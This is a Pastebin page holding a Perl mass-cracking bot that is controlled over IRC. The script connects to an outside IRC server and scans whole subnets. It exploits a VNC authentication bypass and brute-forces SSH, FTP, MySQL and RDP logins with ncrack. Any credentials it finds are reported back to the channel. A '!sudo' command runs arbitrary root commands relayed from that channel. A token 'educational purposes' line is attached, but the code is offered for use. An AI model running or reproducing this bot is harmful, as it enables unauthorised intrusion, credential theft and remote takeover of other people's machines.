independentt

NCrack mass cracker (private)

Apr 23rd, 2016
27,071
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. # Use at your own risk!
  3. #For it to crack you need to install ncrack or be using a l337 OS like KaliLinux v2
  4. #Also you will need to create /user and /pass file (the tested credentials on target)
  5. #The code is still buggy. Sorry but I'm still noob at perl >_>
  6. #invoke the script like this: sudo perl scan.pl (or as root) perl scan.pl  
  7. #This script was made for eduactional purposes only, please don't attack millitary nor government.
  8. #when you think you gotpasswords in your list type to the bot or channel !list will say it found credentials
  9.  
  10. use IO::Socket;
  11. use IO::Socket::INET;
  12. use threads;
  13. use threads::shared;
  14. use Errno qw(EAGAIN);
  15. use strict;
  16. use warnings;
  17. my $line;
  18. our @results : shared;
  19. our $todo = 0;
  20. our $contatore = 0;
  21. my $orig_thread = "yes";
  22. my $start;
  23. my $end;
  24. my $out_file;
  25. my $range = 99999;
  26. my $random_number = int(rand($range));
  27. my @VNC_PORTS = qw/5900 5901/;
  28. my @ncrack_PORTS  = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] );
  29. my $splits = 8; # Creates 2^N processes.
  30. our $subnet;
  31. my $server="irc.crimeircd.net"; # irc server
  32. my $porta="6667"; # port
  33. my $nick="Guest$random_number";# nick
  34. my $canale="#RDP"; # canale
  35. my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
  36. $sk->autoflush(1);
  37. print $sk "NICK $nick\r\n";
  38. print $sk "USER Guest$random_number 8 * :Perl bot by independent\r\n";
  39.  
  40.  
  41. while ($line = <$sk>) {
  42.   $line =~ s/\r\n$//;
  43.    warn "$line";
  44.    if ($line=~ /PING/) {
  45.    print $sk "PONG :$server\r\n";
  46.    print $sk "JOIN $canale \r\n";
  47.    printa("?Ping Pong!, pastebin.com/raw/cp5BZnv4");
  48.  
  49.   }
  50.   if ($line=~ /nospoof/) {
  51.    print $sk "NOTICE IRC :mIRC v7.45\r\n";
  52.     print $sk "CAP LS\r\n";
  53.    print $sk "CAP END\r\n";
  54.   }
  55.     if ($line=~ /!help/) {
  56. printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>");
  57.   }
  58.   if ($line=~ /!list/)
  59.   {
  60.  
  61.     my $file = 'xploits.log';
  62.     open my $fh, '<', $file or warn "Could not open '$file' $!\n";
  63.  
  64.     while (my $lines = <$fh>) {
  65.       chomp $lines;
  66.       if ($lines=~ /'/) {
  67.         printa("$lines");
  68.       }
  69.     }
  70.   }
  71.   if ($line=~ /!reload/)
  72.   {
  73.     printa("Reloading...");
  74.     my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill ncrack");
  75.     system(@cmd);
  76.   }
  77.   if ($line=~ /!die/)
  78.   {
  79.     printa("Dying...");
  80.     my @cmd = ("sudo pkill perl && sudo pkill ncrack");
  81.     system(@cmd);
  82.   }
  83.   if ($line=~ /!sudo\s+(.*)/)
  84.   {
  85.         my $command = $1;
  86.         printa("Done: $command ");
  87.     my $cmd = "sudo $command";
  88.     my @output = `$cmd 2>&1 3>&1`;
  89.     foreach(@output) {
  90.       printa("$_\r\n");
  91.     }
  92.   }
  93.  
  94.  
  95.   if ($line=~ /!scan (.+)/)
  96.   {
  97.  
  98.  
  99.     $todo = 0;
  100.     $subnet = $1;
  101.     if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) {
  102.  
  103.       # Put the subnet in the form x.y.z. so we can just concatenate the hostnum.
  104.       $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
  105.       $subnet .= ".";
  106.       printa("Scanning subnet ${subnet}x\n");
  107.  
  108.       CHECK: {
  109.         unless ($splits >= 0 && $splits <= 8) {
  110.           die "ERROR: Do not split $splits times--that makes no sense.\n";
  111.         }
  112.       }
  113.  
  114.       # Ugly, but this works.
  115.       DivideWork() if $splits >= 1;
  116.       DivideWork() if $splits >= 2;
  117.       DivideWork() if $splits >= 3;
  118.       DivideWork() if $splits >= 4;
  119.       DivideWork() if $splits >= 5;
  120.       DivideWork() if $splits >= 6;
  121.       DivideWork() if $splits >= 7;
  122.       DivideWork() if $splits >= 8;
  123.  
  124.       $start = $todo << (8 - $splits);
  125.       $end = $start + (256 / (2**$splits)) - 1;
  126.  
  127.       foreach ($start .. $end) {
  128.  
  129.         Scan_ALL($_);
  130.  
  131.       }
  132.      }
  133.    
  134.    else {
  135.       printa("Are you brain-dead? Use a correct IP format. ");
  136.     }
  137.  
  138.   }
  139. }
  140.  
  141.  
  142.   ####################################
  143.  
  144.   sub DivideWork {
  145.     my $pid;
  146.  
  147.     FORK: {
  148.       $todo *= 2;
  149.       if ($pid = fork) {
  150.         # Parent
  151.         ++$todo;
  152.  
  153.         } elsif (defined $pid) {
  154.         # Child
  155.         $orig_thread = "no";
  156.  
  157.         } elsif ($! == EAGAIN) {
  158.         # Recoverable forking error.
  159.         sleep 7;
  160.         redo FORK;
  161.  
  162.         } else {
  163.         # Unable to fork.
  164.         printa("Unable to fork: $!\n");
  165.  
  166.       }
  167.     }
  168.   }
  169.  
  170.  
  171.  
  172.   sub Scan_ALL {
  173.     # Scan for OpenVNC 4.11 authentication bypass.
  174.  
  175.     my $hostnum = shift;
  176.     my $host = $subnet . $hostnum;
  177.     my $sock;
  178.     my $proto_ver;
  179.     my $ignored;
  180.     my $auth_type;
  181.     my $sec_types;
  182.     my $vnc_data;
  183.  
  184.  
  185.     $host or printa("ERROR: missing Host IP address Scan_ALL.");
  186.  
  187.     # The host numbers .0 and .255 are reserved; ignore them.
  188.     if ($hostnum <= 0 or $hostnum >= 255) { return; }
  189.  
  190.     # Format things nicely--that crazy formula just adds spaces.
  191.     $results[$hostnum] = "$host";
  192.     $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
  193.     foreach my $port (@VNC_PORTS)
  194.     {
  195.       if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp')) {
  196.  
  197.         $sock->read($proto_ver, 12);
  198.         print $sock $proto_ver;
  199.  
  200.         # Get supported security types and ignore them.
  201.         $sock->read($sec_types, 1);
  202.  
  203.         $sock->read($ignored, unpack('C', $sec_types));
  204.         # Claim that we only support no authentication.
  205.         print $sock "\x01";
  206.  
  207.  
  208.         # We should get "0000" back, indicating that they won't fall back to no authentication.
  209.         $sock->read($auth_type, 4);
  210.         if (unpack('I', $auth_type)) {
  211.           close($sock);
  212.           return;
  213.         }
  214.  
  215.         # Client initialize.
  216.         print $sock "\x01";
  217.  
  218.         # If the server starts sending data, we're in.
  219.         $sock->read($vnc_data, 4);
  220.         printa("[Xploiting VNC] $host");
  221.         if (unpack('I', $vnc_data)) {
  222.           $results[$hostnum] .= "VNC Vulnerable: $proto_ver\n";
  223.           printa("9,3 [ $port ] $results[$hostnum] $port ");
  224.         }
  225.       }
  226.     }
  227.     foreach my $port (@ncrack_PORTS)
  228.     {
  229.       if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port->[0], Proto => 'tcp')) {
  230.         close($sock);
  231.         printa("[Cracking " . $port->[1] . "] $host");
  232.         my @cmdncrack = ("ncrack -U /user -P /pass " . lc($port->[1]) . "://" . $host . ",at=5,cl=1,CL=3,cd=5s,cr=0,to=2h --connection-limit 64 -v -f >>xploits.log");
  233.         system(@cmdncrack);
  234.         return;
  235.       }
  236.     }
  237.  
  238.     close($sock);
  239.     return;
  240.   }
  241.  
  242.   sub printa {
  243.     print $sk "PRIVMSG $canale :4,5 $_[0]. \r\n";
  244.   }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×